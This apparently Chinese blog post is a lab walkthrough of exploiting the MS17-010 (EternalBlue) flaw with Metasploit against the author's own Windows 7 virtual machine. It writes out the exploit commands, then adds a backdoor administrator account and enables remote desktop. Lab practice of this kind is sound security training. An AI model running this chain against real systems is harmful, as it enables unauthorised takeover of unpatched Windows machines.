1、环境搭建
win10安装vmware软件
新建虚拟机安装windows_7旗舰版(靶机系统,待破解的windows),搭建完成后关闭系统防火墙,配置网络IP地址。
新建虚拟机kali-linux(渗透测试系统环境),配置网络IP地址,两个系统保持一致。
搭建过程略
2、检查kali系统到靶机系统是否通畅。
3、在kali系统中开启msfconsole,Msfconsole是Metasploit框架中的一个交互式命令行工具,用于执行各种渗透测试任务。
4、搜索漏洞使用命令search ms17-010,在Metasploit框架中搜索与MS17-010(永恒之蓝)漏洞相关的模块和工具。
5、使用2号漏洞 use 2 回车
6、瞄准目标,设置目标主机,set rhosts 192.168.187.11(靶机IP地址)。
7、开始共计测试,输入run,后面红框内容说明攻击成功。
8、执行shell,进入靶机DOS,Shell是一种命令行界面,用于用户与操作系统进行交互。
9、显示所有的账户列表,net user
10、添加新用户net user admin 123 /add
11、将admin用户加入到管理员组中,net localgroup administrators admin /add
12、退出靶机,打开靶机的远程桌面功能,run post/windows/manage/enable_rdp
13、使用远程桌面工具连接靶机,连接成功。
© 版权声明
文章版权归作者所有,未经允许请勿转载。如内容涉嫌侵权,请在本页底部进入<联系我们>进行举报投诉!
THE END
- 最新
- 最热
只看作者